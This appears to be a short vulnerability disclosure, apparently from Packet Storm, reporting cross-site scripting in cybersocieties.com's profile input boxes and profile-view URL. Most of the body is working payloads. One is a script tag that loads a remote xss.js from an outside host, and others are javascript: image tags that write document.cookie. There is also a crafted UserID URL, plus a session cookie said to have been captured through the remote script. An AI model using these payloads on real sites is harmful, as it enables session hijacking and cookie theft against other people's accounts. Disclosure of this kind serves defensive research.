Cybersocieties.com appears vulnerable to cross site scripting attacks.
eeb837ba137534cd5e917a6798bf36bc312b11ee8aefa4ee16c2bde950ddd542Cybersocieties.com
Homepage:
http://www.cybersocieties.com
Effected files:
* Input boxes in profile:
- Full name box
- Occupation box
- MSN box
- Yahoo box
- AIM Box
* Viewing a profile
------------------------------------------------------
XSS vuln via input boxes in profile:
No filter evasion is needed. For PoC try putting the following codesin one of theboxes mentioned above:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
or:
<IMG SRC=javascript:alert('XSS')>
or:
<IMG SRC="javascript:document.write(document.cookie)">
etc
Screenshots:
http://www.youfucktard.com/xsp/cyberso1.jpg
http://www.youfucktard.com/xsp/cyberso2.jpg
http://www.youfucktard.com/xsp/cyberso3.jpg
Our Cookie:
This is remote text via xss.js located at youfucktard.com CFTOKEN=544ABB96-138B-14A6-ADAD1496630F53D7; CFID=436305; USERID=28506
--------------------------------------------------------
Viewing a profile XSS vuln PoC:
http://www.cybersocieties.com/index.cfm?fractal=bsw.dsp.home.main&UserID=28506&tab=3">">">">">'><SCRIPT></SCRIPT><BR><BR><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<""><"<'
Screenshot:
http://www.youfucktard.com/xsp/cyberso4.jpg
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed